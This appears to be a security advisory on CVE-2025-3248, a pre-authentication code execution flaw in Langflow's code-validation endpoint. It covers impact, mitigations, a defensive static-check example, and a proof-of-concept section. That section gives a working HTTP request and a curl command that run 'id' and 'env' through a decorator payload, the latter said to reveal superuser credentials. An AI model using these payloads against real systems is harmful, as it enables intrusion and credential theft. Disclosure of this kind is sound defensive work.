Langflow API Pre Auth RCE – CVE-2025-3248

Vulnerable Version

Versions prior to 1.3.0

Fixed Version

Upgrade to the latest version

Base Score

9.8 Critical

Vendor Description:-

Langflow is a visual, low-code platform for developing AI applications, notably those that use multi-agent networks and Retrieval-Augmented Generation (RAG). It provides a drag-and-drop interface that allows developers to link various AI components such as prompts, language models, and data sources without requiring considerable coding. Langflow is open source, Python-based, and LLM/vector store agnostic, allowing developers to quickly construct and test artificial intelligence applications.

Langflow API Pre Auth RCE CVE-2025-3248 Vulnerability Description: –

Langflow’s /api/v1/validate/code endpoint has a flaw in how it handles user-submitted code. Prior to version 1.3.0, the application validated function definitions by parsing the submitted code into an Abstract Syntax Tree (AST) and then processing selected components with Python’s compile() and exec() functions.
The steps include:

  • Parsing the code field with ast.parse().
  • Importing the given modules.
  • Executing function definitions (ast.FunctionDef) to verify their structure.

The problem stems from Python’s behavior during function definition: decorators and default parameter values are evaluated immediately, when the def statement runs, not when the function is called. Malicious code embedded in these places therefore executes during validation, allowing attackers to achieve unauthenticated RCE by sending payloads to the endpoint. The lack of authentication or sandboxing allows unrestricted exploitation.

Impact:-

  • Remote Code Execution: CVE-2025-3248 enables attackers to run arbitrary code remotely, resulting in complete system compromise.
  • Unauthorized Access: By exploiting the vulnerability, attackers can bypass security measures and obtain access to sensitive data.
  • Privilege Escalation: Attackers can increase their privileges within the compromised system, enhancing the possibility of further infiltration.
  • Data Theft and Integrity Risks: Unauthorized access could result in data breaches, file manipulation, or the theft of important business information.
  • Operational Disruptions: Successful exploitation may cause service outages, system instability, and potential business interruptions.

Mitigations:-

  • Upgrade immediately: Users should upgrade to Langflow 1.3.0 or later, where the /api/v1/validate/code endpoint requires authentication.
  • Implement input sandboxing: If custom validation is needed, avoid using the exec() function with untrusted code or employ sandboxing mechanisms.
  • Monitoring and alerting: Use detection to identify unusual requests to validation endpoints and unexpected outgoing connections.
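
The definition-time evaluation described above, next to an AST-only check that never executes the submitted code. This is an added example, not Langflow's code or its fix; the names exec_based_validate, static_validate, trace and SAMPLE are hypothetical, and the sample input is constructed and harmless.

```python
import ast

# Constructed sample: the decorator and the default value are harmless calls
# that only record that they were evaluated. foo() itself is never called.
SAMPLE = (
    "@trace('decorator')\n"
    "def foo(x=trace('default')):\n"
    "    trace('body')\n"
)


def exec_based_validate(code):
    """The risky pattern: exec each FunctionDef in order to 'validate' it."""
    evaluated = []

    def trace(label):
        evaluated.append(label)
        return lambda fn: fn  # works as a decorator and as a default value

    for node in ast.parse(code).body:
        if isinstance(node, ast.FunctionDef):
            module = ast.Module(body=[node], type_ignores=[])
            exec(compile(module, "<string>", "exec"), {"trace": trace})
    return evaluated  # expressions that ran during definition alone


def static_validate(code):
    """Inspect structure only: parse, walk the tree, never compile or exec."""
    findings = []
    for node in ast.walk(ast.parse(code)):
        if not isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        for dec in node.decorator_list:
            findings.append((node.name, "decorator", ast.unparse(dec)))
        kw = [d for d in node.args.kw_defaults if d is not None]
        for default in node.args.defaults + kw:
            if not isinstance(default, ast.Constant):
                findings.append((node.name, "default", ast.unparse(default)))
    return findings


if __name__ == "__main__":
    print("ran during exec-based validation:", exec_based_validate(SAMPLE))
    print("flagged without executing:", static_validate(SAMPLE))
```

The static check is not a sandbox: it only shows that decorators and non-constant defaults can be reported or rejected without running them, and it uses ast.unparse, which needs Python 3.9 or later.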

POC

To test the vulnerability, submit a POST request to the /api/v1/validate/code endpoint containing a malicious Python function definition. For example, the following payload will execute the id command on the server via a decorator:

POST /api/v1/validate/code HTTP/1.1
Host: 192.168.146.137:7860
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 109

{"code": "@exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")\ndef foo():\n  pass"}

Remote code execution is now simple: insert the payload into a decorator. Here’s an example of launching a Python reverse shell against a vulnerable host at 192.168.x.x.
The decorator can raise an exception, allowing for interactive RCE. For example, the following will run the env command and return the login and password of the Langflow superuser, assuming Langflow is configured with authentication enabled:

curl -X POST -H 'Content-Type: application/json' http://192.168.146.137:7860/api/v1/validate/code -d '{"code": "@exec(\"raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"env\\\"))\")\ndef foo():\n  pass"}'

References:-

https://github.com/vulhub/vulhub/tree/master/langflow/CVE-2025-3248

https://horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow
